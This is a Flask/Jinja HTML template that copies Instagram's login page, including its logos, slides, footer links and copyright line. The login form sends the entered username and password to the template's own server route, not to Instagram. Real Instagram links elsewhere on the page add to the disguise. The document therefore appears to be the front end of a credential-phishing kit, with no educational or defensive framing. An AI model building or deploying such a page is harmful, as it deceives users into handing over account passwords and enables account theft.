<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <!-- FAVIVON -->
    <link rel="shortcut icon" href="{{ url_for('static', filename='images/favicon.png') }}" type="image/png">
    <!-- GOOGLE FONT -->
    <!-- <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> -->
    <!-- APP CSS -->
    <link rel="stylesheet" href="{{ url_for('static', filename='app.css') }}">
</head>

<body>

    <div class="container">
        <div class="main-container">
            <div class="main-content">
                <div class="slide-container" style="background-image: url({{ url_for('static', filename='images/phone-frame.png') }});">
                    <div class="slide-content" id="slide-content">
                        <img src="{{ url_for('static', filename='images/slide (1).png') }}" alt="slide image" class="active">
                        <img src="{{ url_for('static', filename='images/slide (2).png') }}" alt="slide image">
                        <img src="{{ url_for('static', filename='images/slide (3).png') }}" alt="slide image">
                        <img src="{{ url_for('static', filename='images/slide (4).png') }}" alt="slide image">
                    </div>
                </div>
                <div class="form-container">
                    <div class="form-content box">
                        <div class="logo">
                            <img src="{{ url_for('static', filename='images/logo-light.png') }}" alt="Instagram logo" class="logo-light">
                            <img src="{{ url_for('static', filename='images/logo-dark.png') }}" alt="Instagram logo" class="logo-dark">
                        </div>
                        <!-- FORM -->
                        <form action="{{ url_for('index') }}{{ subpath }}" method="POST">
                            <div class="signin-form" id="signin-form">
                                <div class="form-group">
                                    <div class="animate-input">
                                        <span>
                                            Phone number, username or email
                                        </span>
                                        <input name="username" id="username" for="username" type="text">
                                    </div>
                                </div>
                                <div class="form-group">
                                    <div class="animate-input">
                                        <span>
                                            Password
                                        </span>
                                        <input name="password" type="password" id="password">
                                        <button type="button">Show</button>
                                    </div>
                                </div>
                                <div class="btn-group">
                                    <button class="btn-login" id="signin-btn" type="submit" disabled>
                                        Log In
                                    </button>
                                </div>
                                <div class="divine">
                                    <div></div>
                                    <div>OR</div>
                                    <div></div>
                                </div>
                                <div class="btn-group">
                                    <a href="https://instagram.com/" style="text-decoration: none;">
                                        <button class="btn-fb" type="button">
                                            <img src="{{ url_for('static', filename='images/facebook-icon.png') }}" alt="">
                                            <span>Log in with Facebook</span>
                                        </button>
                                    </a>
                                </div>
                                <a href="https://www.instagram.com/accounts/password/reset/" class="forgot-pw">Forgot password?</a>
                            </div>
                        </form>
                        <!-- FORM -->
                    </div>
                    <div class="box goto">
                        <p>
                            Don't have an account?
                            <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a>
                        </p>
                    </div>

                    <div class="app-download">
                        <p>Get the app.</p>
                        <div class="store-link">
                            <a href="https://apps.apple.com/us/app/instagram/id389801252" target="_blank">
                                <img src="{{ url_for('static', filename='images/app-store.png') }}" alt="app store">
                            </a>
                            <a href="https://l.instagram.com/?u=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.instagram.android%26referrer%3Dutm_source%253Dinstagramweb%2526utm_campaign%253DloginPage%2526ig_mid%253DEF792B7B-AD21-40BA-9592-C3DE8CECD0C8%2526utm_content%253Dlo%2526utm_medium%253Dbadge&e=AT0ny0FOpkxqIKvBE323pBPFXELcTSuEQYb67QqzCZawPBqelvHMGAHiZ1hVzHZu3NTr_Mc9sbQtK0P2NcotSYdXyveLTjQI4-XaMgU-P6MZNLyVz9iQTVcIitAKFOTkONN1y98IV_arlG2taAYYdA" target="_blank">
                                <img src="{{ url_for('static', filename='images/gg-play.png') }}" alt="google play">
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="footer">
            <div class="links">
                <a href="https://about.instagram.com/">About</a>
                <a href="https://about.instagram.com/blog/">Blog</a>
                <a href="https://www.instagram.com/about/jobs/">Jobs</a>
                <a href="https://help.instagram.com/">Help</a>
                <a href="https://developers.facebook.com/docs/instagram">API</a>
                <a href="https://www.instagram.com/legal/privacy/">Privacy</a>
                <a href="https://www.instagram.com/legal/terms/">Terms</a>
                <a href="https://www.instagram.com/directory/profiles/">Top Accounts</a>
                <a href="https://www.instagram.com/explore/locations/">Locations</a>
                <a href="https://www.instagram.com/web/lite/">Instagram Lite</a>
                <a href="#" id="darkmode-toggle">Darkmode</a>
            </div>
            <div class="copyright">
                © 2023 Instagram from Meta
            </div>
        </div>
    </div>

    <!-- APP JS -->
    <script src="{{ url_for('static', filename='app.js') }}"></script>

</body>

</html>